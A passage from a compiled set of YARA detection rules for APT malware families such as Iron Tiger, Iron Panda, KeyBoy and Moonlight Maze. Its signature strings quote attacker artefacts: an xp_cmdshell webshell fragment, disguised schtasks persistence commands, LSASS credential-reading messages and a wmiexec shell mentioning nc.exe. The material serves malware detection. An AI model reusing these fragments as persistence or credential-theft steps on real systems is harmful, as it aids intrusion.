= "jingtisanmenxiachuanxiao.vbs" nocase wide ascii $str4 = "Winds Update" nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_GTalk_Trojan { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - GTalk Trojan" reference = "http://goo.gl/T5fSJC" strings: $str1 = "gtalklite.com" nocase wide ascii $str2 = "computer=%s&lanip=%s&uid=%s&os=%s&data=%s" nocase wide ascii $str3 = "D13idmAdm" nocase wide ascii $str4 = "Error: PeekNamedPipe failed with %i" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_HTTPBrowser_Dropper { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - HTTPBrowser Dropper" reference = "http://goo.gl/T5fSJC" strings: $str1 = ".dllUT" nocase wide ascii $str2 = ".exeUT" nocase wide ascii $str3 = ".urlUT" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_HTTP_SOCKS_Proxy_soexe { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Toolset - HTTP SOCKS Proxy soexe" reference = "http://goo.gl/T5fSJC" strings: $str1 = "listen SOCKET error." nocase wide ascii $str2 = "WSAAsyncSelect SOCKET error." nocase wide ascii $str3 = "new SOCKETINFO error!" nocase wide ascii $str4 = "Http/1.1 403 Forbidden" nocase wide ascii $str5 = "Create SOCKET error." nocase wide ascii condition: uint16(0) == 0x5a4d and (3 of ($str*)) } rule IronTiger_NBDDos_Gh0stvariant_dropper { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - NBDDos Gh0stvariant Dropper" reference = "http://goo.gl/T5fSJC" strings: $str1 = "This service can't be stoped." nocase wide ascii $str2 = "Provides support for media palyer" nocase wide ascii $str4 = "CreaetProcess Error" nocase wide ascii $bla1 = "Kill You" nocase wide ascii $bla2 = "%4.2f GB" nocase wide ascii condition: uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_PlugX_DosEmulator { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX DosEmulator" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Dos Emluator Ver" nocase wide ascii $str2 = "\\PIPE\\FASTDOS" nocase wide ascii $str3 = "FastDos.cpp" nocase wide ascii $str4 = "fail,error code = %d." nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_PlugX_FastProxy { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX FastProxy" reference = "http://goo.gl/T5fSJC" strings: $str1 = "SAFEPROXY HTServerTimer Quit!" nocase wide ascii $str2 = "Useage: %s pid" nocase wide ascii $str3 = "%s PORT[%d] TO PORT[%d] SUCCESS!" nocase wide ascii $str4 = "p0: port for listener" nocase wide ascii $str5 = "\\users\\whg\\desktop\\plug\\" nocase wide ascii $str6 = "[+Y] cwnd : %3d, fligth:" nocase wide ascii condition: uint16(0) == 0x5a4d and (any of ($str*)) } rule IronTiger_PlugX_Server { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - PlugX Server" reference = "http://goo.gl/T5fSJC" strings: $str1 = "\\UnitFrmManagerKeyLog.pas" nocase wide ascii $str2 = "\\UnitFrmManagerRegister.pas" nocase wide ascii $str3 = "Input Name..." nocase wide ascii $str4 = "New Value#" nocase wide ascii $str5 = "TThreadRControl.Execute SEH!!!" nocase wide ascii $str6 = "\\UnitFrmRControl.pas" nocase wide ascii $str7 = "OnSocket(event is error)!" nocase wide ascii $str8 = "Make 3F Version Ok!!!" nocase wide ascii $str9 = "PELEASE DO NOT CHANGE THE DOCAMENT" nocase wide ascii $str10 = "Press [Ok] Continue Run, Press [Cancel] Exit" nocase wide ascii condition: uint16(0) == 0x5a4d and (2 of ($str*)) } rule IronTiger_ReadPWD86 { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - ReadPWD86" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Fail To Load LSASRV" nocase wide ascii $str2 = "Fail To Search LSASS Data" nocase wide ascii $str3 = "User Principal" nocase wide ascii condition: uint16(0) == 0x5a4d and (all of ($str*)) } rule IronTiger_Ring_Gh0stvariant { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Malware - Ring Gh0stvariant" reference = "http://goo.gl/T5fSJC" strings: $str1 = "RING RAT Exception" nocase wide ascii $str2 = "(can not update server recently)!" nocase wide ascii $str4 = "CreaetProcess Error" nocase wide ascii $bla1 = "Sucess!" nocase wide ascii $bla2 = "user canceled!" nocase wide ascii condition: uint16(0) == 0x5a4d and ((any of ($str*)) or (all of ($bla*))) } rule IronTiger_wmiexec { meta: author = "Cyber Safety Solutions, Trend Micro" description = "Iron Tiger Tool - wmi.vbs detection" reference = "http://goo.gl/T5fSJC" strings: $str1 = "Temp Result File , Change it to where you like" nocase wide ascii $str2 = "wmiexec" nocase wide ascii $str3 = "By. Twi1ight" nocase wide ascii $str4 = "[both mode] ,delay TIME to read result" nocase wide ascii $str5 = "such as nc.exe or Trojan" nocase wide ascii $str6 = "+++shell mode+++" nocase wide ascii $str7 = "win2008 fso has no privilege to delete file" nocase wide ascii condition: 2 of ($str*) } /* Yara Rule Set Author: Florian Roth Date: 2015-09-16 Identifier: Iron Panda */ /* Rule Set ----------------------------------------------------------------- */ rule IronPanda_DNSTunClient { meta: description = "Iron Panda malware DnsTunClient - file named.exe" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" score = 80 hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431" strings: $s1 = "dnstunclient -d or -domain <domain>" fullword ascii $s2 = "dnstunclient -ip <server ip address>" fullword ascii $s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii $s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii $s5 = "taskkill /im conime.exe" fullword ascii $s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" fullword ascii $s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii $s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii $s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii $s10 = "Coversation produce one error:%s,coversation fail" fullword ascii $s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them } rule IronPanda_Malware1 { meta: description = "Iron Panda Malware" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a" strings: $x1 = "activedsimp.dll" fullword wide $s1 = "get_BadLoginAddress" fullword ascii $s2 = "get_LastFailedLogin" fullword ascii $s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii $s4 = "get_PasswordExpirationDate" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 300KB and all of them } rule IronPanda_Webshell_JSP { meta: description = "Iron Panda Malware JSP" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6" strings: $s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii $s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii $s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii condition: filesize < 330KB and 1 of them } rule IronPanda_Malware_Htran { meta: description = "Iron Panda Malware Htran" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7" strings: $s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii $s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii $s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii $s4 = "[-] ERROR: Must supply logfile name." fullword ascii $s5 = "[SERVER]connection to %s:%d error" fullword ascii $s6 = "[+] Make a Connection to %s:%d...." fullword ascii $s7 = "[+] Waiting another Client on port:%d...." fullword ascii $s8 = "[+] Accept a Client on port %d from %s" fullword ascii $s9 = "[+] Make a Connection to %s:%d ......" fullword ascii $s10 = "cmshared_get_ptr_from_atom" fullword ascii $s11 = "_cmshared_get_ptr_from_atom" fullword ascii $s12 = "[+] OK! I Closed The Two Socket." fullword ascii $s13 = "[-] TransmitPort invalid." fullword ascii $s14 = "[+] Waiting for Client on port:%d ......" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them } rule IronPanda_Malware2 { meta: description = "Iron Panda Malware" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91" strings: $s0 = "\\setup.exe" fullword ascii $s1 = "msi.dll.urlUT" fullword ascii $s2 = "msi.dllUT" fullword ascii $s3 = "setup.exeUT" fullword ascii $s4 = "/c del /q %s" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 180KB and all of them } rule IronPanda_Malware3 { meta: description = "Iron Panda Malware" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742" strings: $s0 = "PluginDeflater.exe" fullword wide $s1 = ".Deflated" fullword wide $s2 = "PluginDeflater" fullword ascii $s3 = "DeflateStream" fullword ascii /* Goodware String - occured 1 times */ $s4 = "CompressionMode" fullword ascii /* Goodware String - occured 4 times */ $s5 = "System.IO.Compression" fullword ascii /* Goodware String - occured 6 times */ condition: uint16(0) == 0x5a4d and filesize < 10KB and all of them } rule IronPanda_Malware4 { meta: description = "Iron Panda Malware" author = "Florian Roth" reference = "https://goo.gl/E4qia9" date = "2015-09-16" hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c" strings: $s0 = "TestPlugin.dll" fullword wide $s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide $s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii $s6 = "TestPlugin" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 10KB and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule rtf_Kaba_jDoe { meta: author = "@patrickrolsen" maltype = "APT.Kaba" filetype = "RTF" version = "0.1" description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620" date = "2013-12-10" strings: $magic1 = { 7b 5c 72 74 30 31 } // {\rt01 $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1 $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3 $author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe" $author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone" $string1 = { 44 30 [16] 43 46 [23] 31 31 45 } condition: ($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1 } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2016-05-24 Identifier: TidePool (Ke3chang) */ /* APTKe3chang */ rule TidePool_Malware { meta: description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks" author = "Florian Roth" reference = "http://goo.gl/m2CXWR" date = "2016-05-24" hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba" hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed" hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18" hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f" hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba" strings: $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide $x4 = "IEComDll.dat" fullword ascii $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide $s3 = "network.proxy.socks_port\", " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 200KB and ( 1 of ($x*) ) ) or ( 4 of them ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule KeyBoy_Dropper { meta: Author = "Rapid7 Labs" Date = "2013/06/07" Description = "Strings inside" Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india" strings: $1 = "I am Admin" $2 = "I am User" $3 = "Run install success!" $4 = "Service install success!" $5 = "Something Error!" $6 = "Not Configed, Exiting" condition: all of them } rule KeyBoy_Backdoor { meta: Author = "Rapid7 Labs" Date = "2013/06/07" Description = "Strings inside" Reference = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india" strings: $1 = "$login$" $2 = "$sysinfo$" $3 = "$shell$" $4 = "$fileManager$" $5 = "$fileDownload$" $6 = "$fileUpload$" condition: all of them } /* * * This section of the rules are all specific to the new 2016 * KeyBoy sample targeting the Tibetan community. Other following * sections capture file characteristics observed across multiple * years of development. * */ rule new_keyboy_export { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the new 2016 sample's export" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" condition: //MZ header //PE signature //The malware family seems to share many exports //but this is the new kid on the block. uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and pe.exports("cfsUpdate") } rule new_keyboy_header_codes { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the 2016 sample's header codes" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" strings: $s1 = "*l*" wide fullword $s2 = "*a*" wide fullword $s3 = "*s*" wide fullword $s4 = "*d*" wide fullword $s5 = "*f*" wide fullword $s6 = "*g*" wide fullword $s7 = "*h*" wide fullword condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and all of them } /* * * This section of the rules are all broader and will hit on * older KeyBoy samples and other samples possibly part of a * a larger development effort. * */ rule keyboy_commands { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the 2016 sample's sent and received commands" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" strings: $s1 = "Update" wide fullword $s2 = "UpdateAndRun" wide fullword $s3 = "Refresh" wide fullword $s4 = "OnLine" wide fullword $s5 = "Disconnect" wide fullword $s6 = "Pw_Error" wide fullword $s7 = "Pw_OK" wide fullword $s8 = "Sysinfo" wide fullword $s9 = "Download" wide fullword $s10 = "UploadFileOk" wide fullword $s11 = "RemoteRun" wide fullword $s12 = "FileManager" wide fullword condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and 6 of them } rule keyboy_errors { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the sample's shell error2 log statements" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" strings: //These strings are in ASCII pre-2015 and UNICODE in 2016 $error = "Error2" ascii wide //2016 specific: $s1 = "Can't find [%s]!Check the file name and try again!" ascii wide $s2 = "Open [%s] error! %d" ascii wide $s3 = "The Size of [%s] is zero!" ascii wide $s4 = "CreateThread DownloadFile[%s] Error!" ascii wide $s5 = "UploadFile [%s] Error:Connect Server Failed!" ascii wide $s6 = "Receive [%s] Error(Recved[%d] != Send[%d])!" ascii wide $s7 = "Receive [%s] ok! Use %2.2f seconds, Average speed %2.2f k/s" ascii wide $s8 = "CreateThread UploadFile[%s] Error!" ascii wide //Pre-2016: $s9 = "Ready Download [%s] ok!" ascii wide $s10 = "Get ControlInfo from FileClient error!" ascii wide $s11 = "FileClient has a error!" ascii wide $s12 = "VirtualAlloc SendBuff Error(%d)" ascii wide $s13 = "ReadFile [%s] Error(%d)..." ascii wide $s14 = "ReadFile [%s] Data[Readed(%d) != FileSize(%d)] Error..." ascii wide $s15 = "CreateThread DownloadFile[%s] Error!" ascii wide $s16 = "RecvData MyRecv_Info Size Error!" ascii wide $s17 = "RecvData MyRecv_Info Tag Error!" ascii wide $s18 = "SendData szControlInfo_1 Error!" ascii wide $s19 = "SendData szControlInfo_3 Error!" ascii wide $s20 = "VirtualAlloc RecvBuff Error(%d)" ascii wide $s21 = "RecvData Error!" ascii wide $s22 = "WriteFile [%s} Error(%d)..." ascii wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and $error and 3 of ($s*) } rule keyboy_systeminfo { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the system information format before sending to C2" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" strings: //These strings are ASCII pre-2015 and UNICODE in 2016 $s1 = "SystemVersion: %s" ascii wide $s2 = "Product ID: %s" ascii wide $s3 = "InstallPath: %s" ascii wide $s4 = "InstallTime: %d-%d-%d, %02d:%02d:%02d" ascii wide $s5 = "ResgisterGroup: %s" ascii wide $s6 = "RegisterUser: %s" ascii wide $s7 = "ComputerName: %s" ascii wide $s8 = "WindowsDirectory: %s" ascii wide $s9 = "System Directory: %s" ascii wide $s10 = "Number of Processors: %d" ascii wide $s11 = "CPU[%d]: %s: %sMHz" ascii wide $s12 = "RAM: %dMB Total, %dMB Free." ascii wide $s13 = "DisplayMode: %d x %d, %dHz, %dbit" ascii wide $s14 = "Uptime: %d Days %02u:%02u:%02u" ascii wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and 7 of them } rule keyboy_related_exports { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the new 2016 sample's export" date = "2016-08-28" md5 = "495adb1b9777002ecfe22aaf52fcee93" condition: //MZ header //PE signature //The malware family seems to share many exports //but this is the new kid on the block. uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 200KB and pe.exports("Embedding") or pe.exports("SSSS") or pe.exports("GetUP") } // Note: The use of the .Init section has been observed in nearly // all samples with the exception of the 2013 VN dropper from the // Rapid7 blog. The config data was stored in that sample's .data // section. rule keyboy_init_config_section { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches the Init section where the config is stored" date = "2016-08-28" condition: //MZ header //PE signature //Payloads are normally smaller but the new dropper we spotted //is a bit larger. //Observed virtual sizes of the .Init section vary but they've //always been 1024, 2048, or 4096 bytes. uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 300KB and for any i in (0..pe.number_of_sections - 1): (pe.sections[i].name == ".Init" and pe.sections[i].virtual_size % 1024 == 0) } rule EliseLotusBlossom { meta: author = "Jose Ramon Palanco" date = "2015-06-23" description = "Elise Backdoor Trojan" ref = "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" strings: $magic = { 4d 5a } $s1 = "\",Update" wide $s2 = "LoaderDLL.dll" $s3 = "Kernel32.dll" $s4 = "{5947BACD-63BF-4e73-95D7-0C8A98AB95F2}" $s5 = "\\Network\\" wide $s6 = "0SSSSS" $s7 = "441202100205" $s8 = "0WWWWW" condition: $magic at 0 and all of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule MiniDionis_readerView { meta: description = "MiniDionis Malware - file readerView.exe / adobe.exe" author = "Florian Roth" reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950" date = "2015-07-20" /* Original Hash */ hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145" /* Derived Samples */ hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004" hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f" hash4 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7" hash5 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46" hash6 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e" strings: $s1 = "%ws_out%ws" fullword wide /* score: '8.00' */ $s2 = "dnlibsh" fullword ascii /* score: '7.00' */ $op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } /* Opcode */ $op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } /* Opcode */ $op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } /* Opcode */ condition: uint16(0) == 0x5a4d and filesize < 500KB and all of ($s*) and 1 of ($op*) } /* Related - SFX files or packed files with typical malware content -------- */ rule Malicious_SFX1 { meta: description = "SFX with voicemail content" author = "Florian Roth" reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950" date = "2015-07-20" hash = "c0675b84f5960e95962d299d4c41511bbf6f8f5f5585bdacd1ae567e904cb92f" strings: $s0 = "voicemail" ascii /* PEStudio Blacklist: strings */ /* score: '30.00' */ $s1 = ".exe" ascii condition: uint16(0) == 0x4b50 and filesize < 1000KB and $s0 in (3..80) and $s1 in (3..80) } rule Malicious_SFX2 { meta: description = "SFX with adobe.exe content" author = "Florian Roth" reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950" date = "2015-07-20" hash = "502e42dc99873c52c3ca11dd3df25aad40d2b083069e8c22dd45da887f81d14d" strings: $s1 = "adobe.exe" fullword ascii /* PEStudio Blacklist: strings */ /* score: '27.00' */ $s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide /* PEStudio Blacklist: strings */ /* score: '26.00' */ $s3 = "GETPASSWORD1" fullword wide /* PEStudio Blacklist: strings */ /* score: '23.00' */ condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule MiniDionis_VBS_Dropped { meta: description = "Dropped File - 1.vbs" author = "Florian Roth" reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/" date = "2015-07-21" hash = "97dd1ee3aca815eb655a5de9e9e8945e7ba57f458019be6e1b9acb5731fa6646" strings: $s1 = "Wscript.Sleep 5000" ascii $s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii $s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii $s4 = "If(FSO.FileExists(\"" ascii $s5 = "then FSO.DeleteFile(\".\\" ascii condition: filesize < 1KB and all of them and $s1 in (0..40) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule MirageStrings { meta: description = "Mirage Identifying Strings" author = "Seth Hardy" last_modified = "2014-06-25" strings: $ = "Neo,welcome to the desert of real." wide ascii $ = "/result?hl=en&id=%s" condition: any of them } rule Mirage { meta: description = "Mirage" author = "Seth Hardy" last_modified = "2014-06-25" condition: MirageStrings } rule Mirage_APT { meta: Author = "Silas Cutler" Date = "yyyy/mm/dd" Description = "Malware related to APT campaign" Reference = "Useful link" strings: $a1 = "welcome to the desert of the real" $a2 = "Mirage" $b = "Encoding: gzip" $c = /\/[A-Za-z]*\?hl=en/ condition: (($a1 or $a2) or $b) and $c } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Molerats_certs { meta: Author = "FireEye Labs" Date = "2013/08/23" Description = "this rule detections code signed with certificates used by the Molerats actor" Reference = "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html" strings: $cert1 = { 06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75 } $cert2 = { 03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28 } $cert3 = { 0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d } condition: 1 of ($cert*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Backdoor_APT_Mongal { meta: author = "@patrickrolsen" maltype = "Backdoor.APT.Mongall" version = "0.1" reference = "fd69a799e21ccb308531ce6056944842" date = "01/04/2014" strings: $author = "author user" $title = "title Vjkygdjdtyuj" nocase $comp = "company ooo" $cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10" $passwd = "password 00000000" condition: all of them } rule MongalCode { meta: description = "Mongal code features" author = "Seth Hardy" last_modified = "2014-07-15" strings: // gettickcount value checking $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB } condition: any of them } rule MongalStrings { meta: description = "Mongal Identifying Strings" author = "Seth Hardy" last_modified = "2014-07-15" strings: $ = "NSCortr.dll" $ = "NSCortr1.dll" $ = "Sina.exe" condition: any of them } rule Mongal { meta: description = "Mongal" author = "Seth Hardy" last_modified = "2014-07-15" condition: MongalCode or MongalStrings } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule apt_RU_MoonlightMaze_customlokitools { meta: author = "Kaspersky Lab" date = "2017-03-15" version = "1.1" last_modified = "2017-03-22" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze Loki samples by custom attacker-authored strings" hash = "14cce7e641d308c3a177a8abb5457019" hash = "a3164d2bbc45fb1eef5fde7eb8b245ea" hash = "dabee9a7ea0ddaf900ef1e3e166ffe8a" hash = "1980958afffb6a9d5a6c73fc1e2795c2" hash = "e59f92aadb6505f29a9f368ab803082e" strings: $a1="Write file Ok..." ascii wide $a2="ERROR: Can not open socket...." ascii wide $a3="Error in parametrs:" ascii wide $a4="Usage: @<get/put> <IP> <PORT> <file>" ascii wide $a5="ERROR: Not connect..." ascii wide $a6="Connect successful...." ascii wide $a7="clnt <%d> rqstd n ll kll" ascii wide $a8="clnt <%d> rqstd swap" ascii wide $a9="cld nt sgnl prcs grp" ascii wide $a10="cld nt sgnl prnt" ascii wide //keeping only ascii version of string -> $a11="ork error" ascii fullword condition: ((any of ($a*))) } rule apt_RU_MoonlightMaze_customsniffer { meta: author = "Kaspersky Lab" date = "2017-03-15" version = "1.1" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze sniffer tools" hash = "7b86f40e861705d59f5206c482e1f2a5" hash = "927426b558888ad680829bd34b0ad0e7" original_filename = "ora;tdn" strings: //strings from ora -> $a1="/var/tmp/gogo" fullword $a2="myfilename= |%s|" fullword $a3="mypid,mygid=" fullword $a4="mypid=|%d| mygid=|%d|" fullword //strings from tdn -> $a5="/var/tmp/task" fullword $a6="mydevname= |%s|" fullword condition: ((any of ($a*))) } rule loki2crypto { meta: author = "Costin Raiu, Kaspersky Lab" date = "2017-03-21" version = "1.0" description = "Rule to detect hardcoded DH modulus used in 1996/1997 Loki2 sourcecode; #ifdef STRONG_CRYPTO /* 384-bit strong prime */" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" hash = "19fbd8cbfb12482e8020a887d6427315" hash = "ea06b213d5924de65407e8931b1e4326" hash = "14ecd5e6fc8e501037b54ca263896a11" hash = "e079ec947d3d4dacb21e993b760a65dc" hash = "edf900cebb70c6d1fcab0234062bfc28" strings: $modulus={DA E1 01 CD D8 C9 70 AF C2 E4 F2 7A 41 8B 43 39 52 9B 4B 4D E5 85 F8 49} condition: (any of them) } rule apt_RU_MoonlightMaze_de_tool { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze 'de' and 'deg' tunnel tool" hash = "4bc7ed168fb78f0dc688ee2be20c9703" hash = "8b56e8552a74133da4bc5939b5f74243" strings: $a1="Vnuk: %d" ascii fullword $a2="Syn: %d" ascii fullword //%s\r%s\r%s\r%s\r -> $a3={25 73 0A 25 73 0A 25 73 0A 25 73 0A} condition: ((2 of ($a*))) } rule apt_RU_MoonlightMaze_cle_tool { meta: author = "Kaspersky Lab" date = "2017-03-27" version = "1.0" last_modified = "2017-03-27" reference = "https://en.wikipedia.org/wiki/Moonlight_Maze" description = "Rule to detect Moonlight Maze 'cle' log cleaning tool" hash = "647d7b711f7b4434145ea30d0ef207b0" strings: $a1="./a filename template_file" ascii 